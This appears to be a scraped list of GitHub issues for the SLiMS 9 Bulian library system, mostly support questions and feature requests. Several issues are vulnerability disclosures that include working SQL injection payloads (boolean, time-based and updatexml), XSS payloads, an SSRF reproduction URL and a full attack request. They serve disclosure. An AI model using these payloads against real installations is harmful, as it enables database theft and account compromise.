**Describe the bug** I want to change the language to Persian, but when I change the default language to Persian from the system tab, only some titles are translated to Persian. What should I do to solve this problem? **Screenshots** If applicable, add screenshots to help explain your problem. ![Senayan](https://user-images.githubusercontent.com/90859044/186692634-8796d2f1-688f-4da8-b576-56778bed2c60.png)
The default Persian language is not complete!!!
https://api.github.com/repos/slims/slims9_bulian/issues/159/comments
1
2022-08-25T14:30:03Z
2022-12-22T10:17:47Z
https://github.com/slims/slims9_bulian/issues/159
1,350,994,958
159
[ "slims", "slims9_bulian" ]
**The bug** A Server Side Request Forgery exists in `admin/modules/bibliography/marcsru.php` and `admin/modules/bibliography/z3950sru.php` due to the class in `lib/marc/XMLParser.inc.php` **Reproduce** Steps to reproduce the behavior: 1. Go to `http://127.0.0.1:8008/slims9_bulian-9.4.2/admin/index.php?mod=bibliography` then go to copy cataloguing 2. choose between marc sru or 23950sru 3. type in something what you want in the search bar 4. set burpsuite intercept on 5. change the `z3950_SRU_source` or `marc_SRU_source` parameter value to some url that grab the traffic 6. forward the request 7. or just visit `http://127.0.0.1:8008/slims9_bulian-9.4.2/admin/modules/bibliography/marcsru.php?keywords=aaaaaaaa&index=0&marc_SRU_source=URL_ENCODED_ENDPOINT_THAT_CAPTURE_HTTP_LIKE_HOOKBIN` **Screenshots** Normal requests <img width="1435" alt="Screen Shot 2022-08-12 at 04 11 39" src="https://user-images.githubusercontent.com/46653986/184243053-ddf2bf58-051e-4c45-8873-c573c2ce7394.png"> Tampered and SSRF trigger(netcat) <img width="1438" alt="Screen Shot 2022-08-12 at 04 13 21" src="https://user-images.githubusercontent.com/46653986/184243621-ca8f82af-4a18-4abe-8ef4-c69e51c8a60d.png"> Tampered and SSRF trigger(toptal.com) <img width="1440" alt="Screen Shot 2022-08-12 at 04 22 25" src="https://user-images.githubusercontent.com/46653986/184244902-e9df9ed5-7c03-4c0b-bdf9-a58312c3cf67.png"> **Versions** - OS: MacOS Mojave 10.14.6 - Browser: Google Chrome | 103.0.5060.134 (Official Build) (x86_64) - Slims Version: slims9_bulian-9.4.2
[Security Bugs] Server Side Request Forgery
https://api.github.com/repos/slims/slims9_bulian/issues/158/comments
0
2022-08-11T21:31:20Z
2022-11-24T07:56:26Z
https://github.com/slims/slims9_bulian/issues/158
1,336,516,748
158
[ "slims", "slims9_bulian" ]
**Describe the bug** A clear and concise description of what the bug is. **To Reproduce** Steps to reproduce the behavior: 1. Go to '...' 2. Click on '....' 3. Scroll down to '....' 4. See error **Expected behavior** A clear and concise description of what you expected to happen. **Screenshots** If applicable, add screenshots to help explain your problem. **Desktop (please complete the following information):** - OS: [e.g. iOS] - Browser [e.g. chrome, safari] - Version [e.g. 22] **Smartphone (please complete the following information):** - Device: [e.g. iPhone6] - OS: [e.g. iOS8.1] - Browser [e.g. stock browser, safari] - Version [e.g. 22] **Additional context** Add any other context about the problem here.
Bulian9 Portable: showing following error how to solve it: All GMD/Media
https://api.github.com/repos/slims/slims9_bulian/issues/157/comments
1
2022-08-11T13:50:16Z
2022-11-12T02:43:23Z
https://github.com/slims/slims9_bulian/issues/157
1,335,991,587
157
[ "slims", "slims9_bulian" ]
**Describe the bug** XSS in search bar **To Reproduce** Steps to reproduce the behavior: 1. Go to the website and make sure it has more than 10 bibliography/books 2. put this payload (`<IMG SRC="jav&x09;ascript:alert('XSS');"><script>alert("xss by 0xdc9");</script>`) in the search bar and enter 3. an alert that said "xss_by_0xdc9" should pops **Screenshots** <img width="1440" alt="Screen Shot 2022-08-10 at 01 35 40" src="https://user-images.githubusercontent.com/46653986/183736842-e3d69a1c-8a89-4f27-88ac-c21f0a075b51.png"> <img width="1440" alt="Screen Shot 2022-08-10 at 02 23 15" src="https://user-images.githubusercontent.com/46653986/183744266-c064d591-63ce-487e-ac69-fb5300f81196.png"> **Desktop:** - OS: MacOS Mojave 10.14.6 - Browser: Google Chrome | 103.0.5060.134 (Official Build) (x86_64) - Slims Version: slims9_bulian-9.4.2
XSS in search bar
https://api.github.com/repos/slims/slims9_bulian/issues/156/comments
0
2022-08-09T18:44:51Z
2022-09-24T03:27:21Z
https://github.com/slims/slims9_bulian/issues/156
1,333,651,959
156
[ "slims", "slims9_bulian" ]
Hello, i'm new to this. I wanted to change my directory file to D:/upload because my C directory is full, so i changed the code on sysconfig.inc.php. code line 101 : $repobs['enable'] = TRUE; code line 102 : $repobs['path'] = 'D:/upload'; It works, the file i uploaded is saved to D:/upload. But when i want to view the file, instead of view the pdf file it gives this display: ![Screenshot (9)](https://user-images.githubusercontent.com/108775622/177455353-113c7294-d649-4254-87d3-d5994afe44fb.png) I suppose it's because i changed the file directory? any help will be great!
Can't view file when directory changed to D:/upload.
https://api.github.com/repos/slims/slims9_bulian/issues/153/comments
0
2022-07-06T02:36:09Z
2022-07-06T02:36:09Z
https://github.com/slims/slims9_bulian/issues/153
1,295,035,327
153
[ "slims", "slims9_bulian" ]
**Is your feature request related to a problem? Please describe.** The language code for Malay language does not conform to ISO standard in SLiMS. Currently in SLiMS the Malay translation folder is labeled **my_MY** . But the language code for Malay is **ms** , and so the folder should be named **ms_MY** . This is an historical error but is slightly more significant now that a translation for Burmese exists, as **my** is the ISO code for the Burmese ( Myanmar ) language, and that translation will reside in a **my_MM** folder. Some confusion about which language translation is in the folder could arise in the future. **Describe the solution you'd like** Ideally, future SLiMS should have the current **my_MY** folder renamed to **ms_MY** , with an appropriate adjustment in _/lib/lang/localisation.php_ and all future translation folders be checked against ISO standards before naming. Any upgrade processes should take into account the change in folder name. **Describe alternatives you've considered** The alternative is to continue to use the incorrect naming convention, which may cause some continued confusion for new developers, but won't break any of the code. Most end-users will not notice the issue
Correction for Malay language code
https://api.github.com/repos/slims/slims9_bulian/issues/152/comments
1
2022-07-05T12:28:19Z
2022-07-06T10:39:35Z
https://github.com/slims/slims9_bulian/issues/152
1,294,233,074
152
[ "slims", "slims9_bulian" ]
Error: MySQL shutdown unexpectedly. 10:26:09 am [mysql] This may be due to a blocked port, missing dependencies, 10:26:09 am [mysql] improper privileges, a crash, or a shutdown by another method. 10:26:09 am [mysql] Press the Logs button to view error logs and check 10:26:09 am [mysql] the Windows Event Viewer for more clues 10:26:09 am [mysql] If you need more help, copy and post this 10:26:09 am [mysql] entire log window on the forums
MySQL issue in SLims
https://api.github.com/repos/slims/slims9_bulian/issues/150/comments
1
2022-06-20T05:35:43Z
2022-11-12T02:00:48Z
https://github.com/slims/slims9_bulian/issues/150
1,276,390,441
150
[ "slims", "slims9_bulian" ]
https://github.com/slims/slims9_bulian/blob/adab8424f2f5be9b284cd497ee2f36731c4030ed/template/default/classic.php#L182 Forcing to use user's resource (file_get_contents) to checking credit
Unnecessary
https://api.github.com/repos/slims/slims9_bulian/issues/148/comments
2
2022-05-03T16:02:30Z
2023-09-01T07:43:55Z
https://github.com/slims/slims9_bulian/issues/148
1,224,297,298
148
[ "slims", "slims9_bulian" ]
Slims9_bulian vers Cannot disable Header Text in "Change Label Settings" menu for label printing. Select yes to disable cannot hide the title
Change print label settings
https://api.github.com/repos/slims/slims9_bulian/issues/147/comments
0
2022-04-26T03:34:12Z
2022-06-01T14:35:23Z
https://github.com/slims/slims9_bulian/issues/147
1,215,341,743
147
[ "slims", "slims9_bulian" ]
Any Developer make Tutorial How to Integrate any Payment gatway for online fine collection as well membership fees.
(API) Payment API Via Payment Gateway to collect online payment
https://api.github.com/repos/slims/slims9_bulian/issues/146/comments
3
2022-04-24T11:54:53Z
2022-06-01T14:35:53Z
https://github.com/slims/slims9_bulian/issues/146
1,213,633,179
146
[ "slims", "slims9_bulian" ]
**Describe the bug** I have installed bulian on internet hosting. Initially using softaculous and finally installing it manually via upload master bulian. Both are equally inaccessible to the entire menu. The entire configuration menu when clicked displays the same view. **To Reproduce** Steps to reproduce the behavior: 1. login as administrator 2. click all menus **Desktop (please complete the following information):** - OS: Windows 10 - Browser : chrome, firefox - Version : latest
Cannot access all configuration menu in e.g. /admin/index.php?mod=system
https://api.github.com/repos/slims/slims9_bulian/issues/145/comments
1
2022-04-24T08:03:23Z
2022-04-24T13:56:42Z
https://github.com/slims/slims9_bulian/issues/145
1,213,580,346
145
[ "slims", "slims9_bulian" ]
https://github.com/slims/slims9_bulian/blob/adab8424f2f5be9b284cd497ee2f36731c4030ed/admin/modules/bibliography/index.php#L1037
unserialize argument is not a string
https://api.github.com/repos/slims/slims9_bulian/issues/144/comments
0
2022-04-21T14:52:46Z
2022-04-21T14:52:46Z
https://github.com/slims/slims9_bulian/issues/144
1,211,157,502
144
[ "slims", "slims9_bulian" ]
Please USE this for Search and Retrive Date https://github.com/elastic/elasticsearch
Suggetion for Good Search and Retrive
https://api.github.com/repos/slims/slims9_bulian/issues/143/comments
1
2022-04-05T05:36:54Z
2022-11-28T07:27:39Z
https://github.com/slims/slims9_bulian/issues/143
1,192,643,347
143
[ "slims", "slims9_bulian" ]
When I create system users, the save button is not responding. the screenshot is attached, ![slims error](https://user-images.githubusercontent.com/101945218/159133068-b45f37a9-9e3c-49a7-9358-6ee05f9cc983.JPG)
The save button is not responding
https://api.github.com/repos/slims/slims9_bulian/issues/137/comments
3
2022-03-19T18:06:46Z
2022-03-23T05:15:19Z
https://github.com/slims/slims9_bulian/issues/137
1,174,322,329
137
[ "slims", "slims9_bulian" ]
I enable the Reader Counter plugin Title have error Unicode font (Vietnamese Font) ![font](https://user-images.githubusercontent.com/67616643/156276543-e2bff0f8-a196-4ddb-80ac-13bf51ef5739.png) Please fix.
Reader Counter plugin have error Unicode font (Vietnamese Font)
https://api.github.com/repos/slims/slims9_bulian/issues/136/comments
0
2022-03-02T01:21:35Z
2022-03-02T01:21:35Z
https://github.com/slims/slims9_bulian/issues/136
1,156,121,427
136
[ "slims", "slims9_bulian" ]
SLIMS 9 can not search Title/Item on the Bibliography module. Please fix.
SLIMS 9 can not search Titles/Items on the Bibliography Module
https://api.github.com/repos/slims/slims9_bulian/issues/135/comments
3
2022-03-01T04:52:27Z
2023-04-12T14:16:17Z
https://github.com/slims/slims9_bulian/issues/135
1,154,867,199
135
[ "slims", "slims9_bulian" ]
Hi, Slims 8 was good in searching while Sims9 search not good. It fails to search keywords which are available in Title or others field. similarly it display irrelevant results in OPAC
Improve Searching
https://api.github.com/repos/slims/slims9_bulian/issues/134/comments
2
2022-02-26T09:55:19Z
2022-06-01T14:38:38Z
https://github.com/slims/slims9_bulian/issues/134
1,151,580,383
134
[ "slims", "slims9_bulian" ]
How to change decimal format ? in fines menu we cannot add cent format eg. when put 0.20 its read 20
Decimal Format in Circulation : Fines
https://api.github.com/repos/slims/slims9_bulian/issues/133/comments
2
2022-02-10T14:50:36Z
2022-05-22T05:47:33Z
https://github.com/slims/slims9_bulian/issues/133
1,130,217,698
133
[ "slims", "slims9_bulian" ]
Hi, I installed Slims library management through softaculous on my wordpress website. All was working fine for few days and then it started showing error on the log in page. Once i enter the admin or staff or librarian user & pass . It pops up an error which says "INVALID LOGIN FORM" and does not log in. Can i please get some support on this **laptop - OS: [Windows 8] - Browser [chrome]
Invalid login form
https://api.github.com/repos/slims/slims9_bulian/issues/131/comments
3
2022-01-23T14:00:55Z
2022-12-22T10:19:08Z
https://github.com/slims/slims9_bulian/issues/131
1,111,879,548
131
[ "slims", "slims9_bulian" ]
Hi, want to know how to change Rp symbol in fine reports page ?
How to change Rp symbol
https://api.github.com/repos/slims/slims9_bulian/issues/130/comments
2
2022-01-14T12:29:35Z
2022-12-20T06:41:07Z
https://github.com/slims/slims9_bulian/issues/130
1,103,570,470
130
[ "slims", "slims9_bulian" ]
I am library science professional. I want to make proper documentation for this project. i am fresher in this field can any one suggest me how i can make documentation for this project
How i can contribute to this project
https://api.github.com/repos/slims/slims9_bulian/issues/128/comments
1
2021-12-31T06:43:15Z
2021-12-31T07:20:25Z
https://github.com/slims/slims9_bulian/issues/128
1,091,443,336
128
[ "slims", "slims9_bulian" ]
Please Improve Z39.50 Server Linkage
Z39.50
https://api.github.com/repos/slims/slims9_bulian/issues/127/comments
0
2021-12-31T06:41:17Z
2021-12-31T06:41:17Z
https://github.com/slims/slims9_bulian/issues/127
1,091,442,887
127
[ "slims", "slims9_bulian" ]
Please Give Menu/Option to Add Currency Many Library Purchase in Different Currency Please Give Option to add Currency to users as per choice
Price
https://api.github.com/repos/slims/slims9_bulian/issues/126/comments
1
2021-12-31T06:37:04Z
2022-01-20T16:47:43Z
https://github.com/slims/slims9_bulian/issues/126
1,091,441,879
126
[ "slims", "slims9_bulian" ]
**Describe the bug** The feature is comment by default for SLiMS 9 Bulian. But when user want to activate it, they can uncomment within the sub-menu. The appearance of the sub-menu needs to be adjusted for SLiMS 9 Bulian. **To Reproduce** Steps to reproduce the behavior: 1. Uncomment the sub-menu Z3950 service in the submenu.php within admin/modules/bibliography 2. Login to your SLiMS 9 3. Go to Bibliography module 4. See the sub-menu appear **Expected behavior** A sub-menu with appearence needs to be adjusted. **Screenshots** ![image](https://user-images.githubusercontent.com/125229/147381823-7a8de7fd-835e-4529-88b0-09a58ef2e07e.png) **Desktop (please complete the following information):** - OS: MS Windows - Browser: MS Edge - Version: 96.0
Fix Z39.50 sub-menu appearence
https://api.github.com/repos/slims/slims9_bulian/issues/125/comments
1
2021-12-25T09:11:57Z
2022-01-20T16:48:59Z
https://github.com/slims/slims9_bulian/issues/125
1,088,573,261
125
[ "slims", "slims9_bulian" ]
SQL injection exists in the /admin/modules/system/backup.php file. There is no effective defense against the comment field, leading to SQL injection attacks. The link is: `http://192.168.31.63/admin/modules/system/backup.php?action=download&id=1` Vulnerable parameter `id` SQL injection payload `Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: action=download&id=2 OR NOT 8551=8551 ` `Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: action=download&id=2 AND (SELECT 7623 FROM (SELECT(SLEEP(5)))zpJu)` <img width="558" alt="7" src="https://user-images.githubusercontent.com/18564938/147107829-026df7bf-f459-43e8-8388-4508075483bc.png"> The problematic code `if(isset($_GET['action']) && isset($_GET['id']) && $_GET['action'] == 'download'){ $id = utility::filterData('id', 'get', true, true, true); $_q = $dbs->query("SELECT backup_file FROM backup_log WHERE backup_log_id=".$id); $path = $_q->fetch_row()[0];`
[Security Bugs] SQL Injection
https://api.github.com/repos/slims/slims9_bulian/issues/124/comments
1
2021-12-22T14:29:35Z
2022-12-23T03:51:13Z
https://github.com/slims/slims9_bulian/issues/124
1,086,875,971
124
[ "slims", "slims9_bulian" ]
SQL injection exists in the lib/comment.inc.php file. There is no effective defense against the comment field, leading to SQL injection attacks. Ordinary user login "find a book" SQL injection attack in the comments (example:`'and/**/1=(updatexml(1,concat(0x3a,(select/**/user())),1) )/**/and/**/'1'='1` ) <img width="934" alt="5" src="https://user-images.githubusercontent.com/18564938/147071549-90380ba8-eeeb-4bb7-86b0-718de1df0f22.png"> <img width="756" alt="6" src="https://user-images.githubusercontent.com/18564938/147071593-bc47a5f7-f068-4c76-b424-a02c954c7eb4.png"> `SQL Injection request: POST /index.php?p=show_detail&id=17 HTTP/1.1 Host: 192.168.31.63 Content-Length: 110 Cache-Control: max-age=0 Origin: http://192.168.31.63 Upgrade-Insecure-Requests: 1 DNT: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3; q=0.9 Referer: http://192.168.31.63/index.php?p=show_detail&id=17 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: admin_logged_in=1; ckCsrfToken=QlUPE9DlsBjESqNjH6x7Mb9y7y7cIl24Tq13u7c6; SenayanMember=do2fk5pq9qdkqo1phadksnm0u9 Connection: close comment='and/**/1=(updatexml(1,concat(0x3a,(select/**/user())),1))/**/and/**/'1'='1 &SaveComment=Save+comment` `Vulnerable code: $_sql = "Select c.comment, m.member_name, c.input_date from comment AS c LEFT JOIN biblio AS b ON b.biblio_id = c.biblio_id LEFT JOIN member AS m ON m.member_id = c.member_id WHERE b.biblio_id =".$_detail_id. "ORDER BY c.last_update DESC"; $commlist = $dbs->query($_sql); if ($commlist) { $_all_recs = $commlist->num_rows; } if ($_all_recs >0) { $_page = ($page -1) * $_recs_each_page; $_sql .= "Limit". $_page. ", ". $_recs_each_page; $commlist = $dbs->query($_sql); $_list_comment .='<div class="comment-found">'. $_all_recs. __(' comments available').'</div>'; while ($_data = $commlist->fetch_assoc()) { $_list_comment .='<div class="comments">'; $_list_comment .='<div class="comment-member">'.$_data['member_name']. __(' at'). $_data['input_date']. __(' write').'</ div>'; $_list_comment .='<div class="comment-content">'. $_data['comment'].'</div>'; $_list_comment .='</div>'; } $_list_comment .='<div class="comment-found">'.simbio_paging::paging($_all_recs, $_recs_each_page, $int_pages_each_set = 10,'','_self').'</div>'; } if (ISSET($_SESSION['mid'])) { // Comment form $_forms ='<form method="post" action="index.php?p=show_detail&id='.$_detail_id.'" class="comment-form">'; $_forms .= simbio_form_element::textField('textarea','comment','','placeholder="Add your comment" class="comment-input form-control"').'<br />'; $_forms .='<input type="submit" name="SaveComment" value="Save comment" class="s-btn btn btn-primary">'; $_forms .= \Volnix\CSRF\CSRF::getHiddenInputString(); $_forms .='</form>'; return $_list_comment.$_forms;`
[Security Bugs] Sql Injection
https://api.github.com/repos/slims/slims9_bulian/issues/123/comments
1
2021-12-22T09:49:53Z
2022-12-23T03:52:33Z
https://github.com/slims/slims9_bulian/issues/123
1,086,645,532
123
[ "slims", "slims9_bulian" ]
**Describe the bug** Storage type xss exists in Custom Field Editor in /admin/modules/system/custom_field.php file. There is no effective defense against the NOTE field, leading to cross-site script attacks. **To Reproduce** Steps to reproduce the behavior: Storage type xss exists in Custom Field Editor in /admin/modules/system/custom_field.php file. There is no effective defense against the NOTE field, leading to cross-site scripting attacks. Administrator login "system" add new "field> fill in cross-site scripting in the NOTE field `(example:'"><svg/onload=alert(document.domain)>)` It will take effect after saving. **Expected behavior** You can insert js scripts to attack. **Screenshots** <img width="1071" alt="3" src="https://user-images.githubusercontent.com/18564938/147060823-4a8328b5-9ea5-400a-80d2-48c4a8828895.png"> <img width="1087" alt="4" src="https://user-images.githubusercontent.com/18564938/147060883-f5af4b94-3587-4dee-9e94-45415050b3eb.png"> **Desktop :** - OS: [MacBook M1] - Browser [Chrome] - Version [96.0.4664.110]
[Security Bug]Stored cross-site script attacks(xss)
https://api.github.com/repos/slims/slims9_bulian/issues/122/comments
0
2021-12-22T08:39:34Z
2021-12-22T08:39:34Z
https://github.com/slims/slims9_bulian/issues/122
1,086,586,652
122
[ "slims", "slims9_bulian" ]
I go to "Custom Field", add the YEAR Field for Members, with Input Type as Dropdown, Data List = 2021, 2022, 2023, 2024. I go to the Member List, edit for a member as name ABC, at the YEAR Field, I choose 2022, then save, return to the Member List and review the modified member information, at this time, the Dropdown does not automatically select 2022 but still 2021.
Input Type of Dropdown for the Member is not auto fill
https://api.github.com/repos/slims/slims9_bulian/issues/120/comments
0
2021-12-14T01:17:23Z
2021-12-14T01:17:23Z
https://github.com/slims/slims9_bulian/issues/120
1,079,200,602
120
[ "slims", "slims9_bulian" ]
**Describe the bug** The Front-end Default Template automatically makes the text bold at the bottom of the web page when I click Find Collections on The Popup of Advanced Search **Additional context** Please fix it, thanks.
The Front-end Default Template automatically makes the text bold at the Footer when using Advanced Search
https://api.github.com/repos/slims/slims9_bulian/issues/115/comments
0
2021-11-29T23:51:04Z
2021-11-29T23:51:04Z
https://github.com/slims/slims9_bulian/issues/115
1,066,621,503
115
[ "slims", "slims9_bulian" ]
**Describe the bug** Image of Title Biblio not show on the Front-end and it dubplicate jpg/png extension (ex my-book.png.png) in my storage host **Desktop (please complete the following information):** ALL **Smartphone (please complete the following information):** ALL **Additional context** Add any other context about the problem here.
Image of Title Biblio not show on the Front-end and it dubplicate jpg/png extension (ex my-book.png.png) in my storage host
https://api.github.com/repos/slims/slims9_bulian/issues/114/comments
0
2021-11-29T02:46:01Z
2021-11-29T02:46:01Z
https://github.com/slims/slims9_bulian/issues/114
1,065,546,353
114
[ "slims", "slims9_bulian" ]
**Describe the bug** Pencarian buku dengan kata kunci tertentu tidak menghasilkan data yang sesuai. Kami melakukan upgrade dari versi SLIMS 7 ke SLIMS 9. **To Reproduce** Steps to reproduce the behavior: 1. Menuju Halaman Utama 2. Masukan kata kunci 3. Enter **Expected behavior** Data yang dimunculkan tidak sesuai dengan kata kunci. Misalkan ada judul sbb: `Low Vision Aids & Technology : A Guide` Buku tersebut bisa ditemukan dengan kata kunci: `vision` / `Vision` `aids` / `Aids` ![image](https://user-images.githubusercontent.com/2446798/143171132-45f34bf6-b0e1-44aa-a252-c315820820dc.png) tetapi **Tidak bisa ditemukan** dengan kata kunci: `low` `low vision` ![image](https://user-images.githubusercontent.com/2446798/143171072-0f3fd00f-f76c-4c23-aa53-7c705d38c36b.png) atau bahkan tidak bisa ditemukan dengan judul lengkap ![image](https://user-images.githubusercontent.com/2446798/143171283-c0612474-59c8-4f78-b211-5e2cab2d7305.png) Pada versi senayan 7, masih bisa ditemukan: ![image](https://user-images.githubusercontent.com/2446798/143171468-e945b608-14e6-4b57-9643-0a1d00a681a0.png) Untuk senayan 9, tidak dapat ditemukan: ![image](https://user-images.githubusercontent.com/2446798/143171544-5150b0bf-03ff-4067-be26-e89cb93869a8.png) **Screenshots** Attached above. **Desktop (please complete the following information):** - OS: Ubuntu 20.04, MacOS Catalina, Windows 10/11 - Browser you name it. Tried every browser. - Version latest on 24 Nov 2021 **Additional context** mungkin OOT, tapi dengan pencarian ini pengunjung dapat mengetahui kami memiliki buku ini atau tidak. jadi sangat membantu dan agar menghindari kontak langsung dengan pustakawan karena kami sudah menyediakan komputer untuk pencarian judul buku.
Pencarian buku tidak menghasilkan data yang sesuai
https://api.github.com/repos/slims/slims9_bulian/issues/112/comments
1
2021-11-24T03:50:19Z
2021-11-24T07:26:49Z
https://github.com/slims/slims9_bulian/issues/112
1,061,970,577
112
[ "slims", "slims9_bulian" ]
Please, update the translation .po file with latest changes made
Update translation english file
https://api.github.com/repos/slims/slims9_bulian/issues/110/comments
0
2021-11-10T12:26:30Z
2021-11-10T12:26:30Z
https://github.com/slims/slims9_bulian/issues/110
1,049,761,895
110
[ "slims", "slims9_bulian" ]
An option can be given during installation for item price. Since, Indonesian and English number formatting are different, we badly need to set it decimal (6,2). So, if users can select it during, it would be great for International community.
Price format
https://api.github.com/repos/slims/slims9_bulian/issues/108/comments
0
2021-10-27T17:24:17Z
2021-10-27T17:24:17Z
https://github.com/slims/slims9_bulian/issues/108
1,037,674,821
108
[ "slims", "slims9_bulian" ]
Dashboard number format is default id-ID, Please add a system preference to show number format in either Indonesian or English and if possible for others....
Dashboard Number Format
https://api.github.com/repos/slims/slims9_bulian/issues/107/comments
0
2021-10-27T17:20:54Z
2021-10-27T17:20:54Z
https://github.com/slims/slims9_bulian/issues/107
1,037,671,899
107
[ "slims", "slims9_bulian" ]
[IDN] Ketika mencari suatu koleksi di dalam bibliografi sebagai admin, fitur search tidak bisa digunakan sebagai mana mestinya Hanya berfungsi ke beberapa judul buku Bahkan mencoba mencari koleksi yang baru saja ditambahkan pun hasil pencariannya adalah Kondisi sebelumnya : Upgrade dari SLiMS 8.3.1 Akasia > SLiMS 9.4.2 Bulian Hal yang telah dilakukan :: Clear Cache, pindah browser (Firefox, Edge) Kondisi lain : Saat mencari menggunakan kata kunci yang lebih pendek, kadang datanya keluar (misal : Bilingual) ![Screenshot (91)](https://user-images.githubusercontent.com/60032856/136134598-66778486-f1d2-4e9e-9cbf-fb17d4ab619f.png) ![Screenshot (92)](https://user-images.githubusercontent.com/60032856/136134603-d069ca20-c49e-44f1-9b6c-b4e41f496648.png) 0
Search in bibliography issues
https://api.github.com/repos/slims/slims9_bulian/issues/101/comments
1
2021-10-06T03:10:32Z
2021-10-07T14:46:43Z
https://github.com/slims/slims9_bulian/issues/101
1,017,327,058
101
[ "slims", "slims9_bulian" ]
Hello everyone, I want to associate Google Analytics in my website using SLIMS 9.4.1. I hope someone could tell me which file should I put Tracking Code to in the source code. These are the instruction from Google: ![Screenshot_4](https://user-images.githubusercontent.com/9654732/125881540-d8bfbdbc-8b5b-4d6d-81a6-ec03c2f3612d.png) Thanks in advance!!!
How to associate Google Analytics with websites using SLIMS 9?
https://api.github.com/repos/slims/slims9_bulian/issues/97/comments
1
2021-07-16T02:19:33Z
2021-09-13T13:31:53Z
https://github.com/slims/slims9_bulian/issues/97
945,884,678
97
[ "slims", "slims9_bulian" ]
Hello everyone and dev team, I want to say thank you for dev team who shared SLIMS for everyone can use it free. I have two questions, I hope you guys can help me: 1, I could send emails to members who have overdue loans by clicking on: **Send Notification e-mail**, however It would be great if those emails can be sent automatically rather than manually clicking. How can I do that? ![Screenshot_1](https://user-images.githubusercontent.com/9654732/125228962-f632e300-e2ff-11eb-95e8-5047c57f87bf.png) 2, After emails being sent, members received emails with a font issue in the email title as the image below. The original text was **Vietnamese**, the text in the email content was totally fine. How can I fix this font issue? ![Screenshot_2](https://user-images.githubusercontent.com/9654732/125229034-195d9280-e300-11eb-929a-5d0dfd44a304.png) Thanks in advance!!!
Overdue notification: How can emails be sent automatically and fix a font issue?
https://api.github.com/repos/slims/slims9_bulian/issues/96/comments
2
2021-07-12T04:02:47Z
2023-05-31T14:02:47Z
https://github.com/slims/slims9_bulian/issues/96
941,644,639
96
[ "slims", "slims9_bulian" ]
Hi dev team, I am able to search books with: Title, author, ISBN... However, I could not search books with "Item(s) Data". This is important because our library can use a barcode to scan books quickly with those Items data that we created. Can you guys tell me how to search with Item(s) Data or if SLIMS can not do that for now, can you note this idea to the next version of SLIMS??? Thank you guys very much!!! ![Screenshot_1](https://user-images.githubusercontent.com/9654732/124576670-bc348d80-de76-11eb-85b5-8748d8ec270a.png) Best Regards, Jing
Could not search books with "Items Data"
https://api.github.com/repos/slims/slims9_bulian/issues/95/comments
2
2021-07-06T09:27:46Z
2021-07-07T05:34:59Z
https://github.com/slims/slims9_bulian/issues/95
937,699,009
95
[ "slims", "slims9_bulian" ]
**Is your feature request related to a problem? Please describe.** It's not related to any problem, just a request for new feature (for OPAC user) which is already applied in admin mode. **Describe the solution you'd like** Add "Download MARC File' button after search result shows at OPAC. Then export the selected bibliography as .mrc file. **Describe alternatives you've considered** N/A **Additional context** It will help other system users to import files for them from SLiMS.
MARC Export items from OPAC
https://api.github.com/repos/slims/slims9_bulian/issues/94/comments
0
2021-07-01T13:17:23Z
2021-07-01T13:18:05Z
https://github.com/slims/slims9_bulian/issues/94
934,836,875
94
[ "slims", "slims9_bulian" ]
Hi Slims Dev Team, I could not find where to change the admin password. I read your documentation but could not find where is the **User table?** in phpmyadmin. I hope you guys could help me with this. Thanks in advance!!! Besides, if you guys could add a button in the setting of slims that could help administrators change it easily it would be great! ![image](https://user-images.githubusercontent.com/9654732/123889915-96901b80-d980-11eb-8dda-f24f7390cfb0.png) ![image](https://user-images.githubusercontent.com/9654732/123890555-96dce680-d981-11eb-94db-7c47453de463.png) ![image](https://user-images.githubusercontent.com/9654732/123890537-8f1d4200-d981-11eb-8036-c435696f0748.png)
How to change the admin password?
https://api.github.com/repos/slims/slims9_bulian/issues/93/comments
1
2021-06-30T02:01:19Z
2021-06-30T15:48:17Z
https://github.com/slims/slims9_bulian/issues/93
933,237,380
93
[ "slims", "slims9_bulian" ]
**Is your feature request related to a problem? Please describe.** A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] **Describe the solution you'd like** A clear and concise description of what you want to happen. **Describe alternatives you've considered** A clear and concise description of any alternative solutions or features you've considered. **Additional context** Add any other context or screenshots about the feature request here.
How to using LDAP fearture to get users for update in member login ?
https://api.github.com/repos/slims/slims9_bulian/issues/89/comments
0
2021-06-20T00:23:59Z
2021-06-20T00:23:59Z
https://github.com/slims/slims9_bulian/issues/89
925,492,014
89
[ "slims", "slims9_bulian" ]
Hi everyone, I am using **SLIMS v9** with the template: **Akasia** and I would like to change the default location to my school's location. I know I can do that with the default template in System/Theme/Customize, however I can not do the same thing with Akasia. I hope someone could show me how to change the location. Thank you!!! ![Screenshot_2](https://user-images.githubusercontent.com/9654732/122541448-d89d9100-d053-11eb-8968-bebe32ae2f83.png)
How to change Library Location - Google map?
https://api.github.com/repos/slims/slims9_bulian/issues/88/comments
2
2021-06-18T09:40:47Z
2021-07-06T09:57:51Z
https://github.com/slims/slims9_bulian/issues/88
924,730,715
88
[ "slims", "slims9_bulian" ]
Dear SLIMS dev team, I see we can not search on OPAC with less than 3 keywords in any language. After research now I know how to fix it and I hope you guys can add a button that we can change it easily. Here is how to change it: in: \public_html\config , open the file: sysconfig.local.inc.php , then change "index" to "default" ![image](https://user-images.githubusercontent.com/9654732/121335151-8918e000-c944-11eb-899a-af46771421bc.png) Done. Thanks!
Searching in OPAC with less than 3 keywords
https://api.github.com/repos/slims/slims9_bulian/issues/86/comments
1
2021-06-09T10:03:46Z
2021-06-13T03:23:00Z
https://github.com/slims/slims9_bulian/issues/86
916,023,341
86
[ "slims", "slims9_bulian" ]
Hi dev, I am adding new bibliography attachment. It was set to specific member type. ![image](https://user-images.githubusercontent.com/46837969/121013375-54cde400-c7cb-11eb-92c6-e53d30bd677b.png) But after saving the changes, all member still could access those attachment even unregistered visitor. ![image](https://user-images.githubusercontent.com/46837969/121013595-9d859d00-c7cb-11eb-998f-082402288a27.png)
Bibliography Attachment Still Accessible even after it has set only to member type
https://api.github.com/repos/slims/slims9_bulian/issues/84/comments
3
2021-06-07T12:05:18Z
